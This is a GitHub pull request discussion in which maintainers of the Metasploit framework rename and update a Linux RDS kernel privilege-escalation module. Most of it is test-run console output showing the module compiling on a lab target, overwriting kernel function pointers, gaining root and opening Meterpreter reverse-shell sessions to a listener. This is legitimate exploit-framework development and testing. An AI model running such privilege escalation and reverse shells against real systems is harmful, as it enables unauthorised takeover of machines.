Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Rename exploit/linux/local/rds_priv_esc -> exploit/linux/local/rds_rds_page_copy_user_priv_esc #12744

Merged
merged 3 commits into from
Dec 22, 2019
Merged

Rename exploit/linux/local/rds_priv_esc -> exploit/linux/local/rds_rds_page_copy_user_priv_esc #12744

merged 3 commits into from
Dec 22, 2019

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Dec 18, 2019
edited
Loading

Rename exploit/linux/local/rds_priv_esc -> exploit/linux/local/rds_rds_page_copy_user_priv_esc to avoid ambiguity. Not the first bug in RDS, and won't be the last RDS msf module.

Also update the module to use the new Msf::Post::Linux::Compile mixin and a few small style changes.

@h00die h00die self-assigned this Dec 22, 2019
@h00die
Copy link
Contributor

h00die commented Dec 22, 2019

working on this now, i have a fedora13 box which is vuln to test with, so easy sauce.

@h00die
Copy link
Contributor

h00die commented Dec 22, 2019

Looks like it isn't re-exploitable. I'll tack that in while landing.

[+] Linux kernel version 2.6.33.3-85.fc13.x86_64 appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Max line length is 65537
[*] Writing 5228 bytes in 1 chunks of 18866 bytes (octal-encoded), using printf
[*] Writing '/tmp/.UqcDf' (237 bytes) ...
[*] Max line length is 65537
[*] Writing 237 bytes in 1 chunks of 734 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xffffffff81d63180
[*]  [+] Resolved default_security_ops to 0xffffffff81a6b490
[*]  [+] Resolved cap_ptrace_traceme to 0xffffffff811bde9a
[*]  [+] Resolved commit_creds to 0xffffffff810699da
[*]  [+] Resolved prepare_kernel_cred to 0xffffffff810698cf
[*] [*] Could not bind socket.

h00die added a commit that referenced this pull request Dec 22, 2019
@h00die
Land #12744, rds lpe updates and improvements
4f8382f
@h00die h00die merged commit fce7501 into rapid7:master Dec 22, 2019
@h00die
Copy link
Contributor

h00die commented Dec 22, 2019

4e1e8d3

@h00die
Copy link
Contributor

h00die commented Dec 22, 2019
edited by tperry-r7
Loading

Release Notes

Rename the exploit/linux/local/rds_priv_esc to exploit/linux/local/rds_rds_page_copy_user_priv_esc so other rds exploits can be added without name issues. It also updates rds_rds_page_copy_user_priv_esc to use newer Metasploit libraries.

msjenkins-r7 pushed a commit that referenced this pull request Dec 22, 2019
@h00die @msjenkins-r7
Land #12744, rds lpe updates and improvements
37adfc3
@bcoles
Copy link
Contributor Author

bcoles commented Dec 22, 2019

Looks like it isn't re-exploitable. I'll tack that in while landing.

It is re-exploitable. Did you still have a root session open? You can't get more than one root shell at a time, but if you lose your root shell you can get it back as many times as you'd like.

msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.TimMgNORQ' (237 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.138
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.138:41170) at 2019-12-22 15:31:24 -0500
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Got root!

meterpreter > 
Background session 2? [y/N]  
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.8I4PCZ' (237 bytes) ...
[*] Launching exploit...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Could not bind socket.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > sesions -k 2
[-] Unknown command: sesions.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > sessions -k 2
[*] Killing the following session(s): 2
[*] Killing session 2
[*] 172.16.191.138 - Meterpreter session 2 closed.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.gIneNQVnx' (237 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.138
[*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.138:41171) at 2019-12-22 15:31:59 -0500
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Got root!

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 
Background session 3? [y/N]  
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.NjZtYePB' (237 bytes) ...
[*] Launching exploit...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Could not bind socket.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > sessions -k 3
[*] Killing the following session(s): 3
[*] Killing session 3
[*] 172.16.191.138 - Meterpreter session 3 closed.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.BjXPFJQ' (237 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.138
[*] Meterpreter session 4 opened (172.16.191.165:4444 -> 172.16.191.138:41172) at 2019-12-22 15:33:10 -0500
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Got root!

meterpreter >

@bcoles bcoles deleted the rds_rds_page_copy_user_priv_esc branch December 22, 2019 20:36
@h00die
Copy link
Contributor

h00die commented Dec 22, 2019

Interesting. I did have my previous root session open. I'll add a PR with that note in the docs later.

@bcoles
Copy link
Contributor Author

bcoles commented Dec 22, 2019

Interesting. I did have my previous root session open. I'll add a PR with that note in the docs later.

This could probably be fixed by redefining the ports used:

#define RECVPORT 5555 
#define SENDPORT 6666

Or perhaps cleanly killing the socket upon completion.

However, I'm not particularly interested in pursuing this further. Closing the socket may or may not affect system stability (unknown, I haven't looked). Redefining the ports is problematic, as pre-compiled exploits are used, and I don't feel like rewriting the C to handle the ports as arguments, standard input, or environment variables.

Although now that I look at the C code, modifying it to execute argv[1] was a dumb idea and unnecessary. I should have left the code as is and just shoved the payload path into stdin, as is tradition.

@h00die h00die mentioned this pull request Jan 4, 2020
Merged
@tperry-r7 tperry-r7 added the rn-enhancement release notes enhancement label Jan 14, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@h00die h00die

Labels
easy module rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@bcoles @h00die @tperry-r7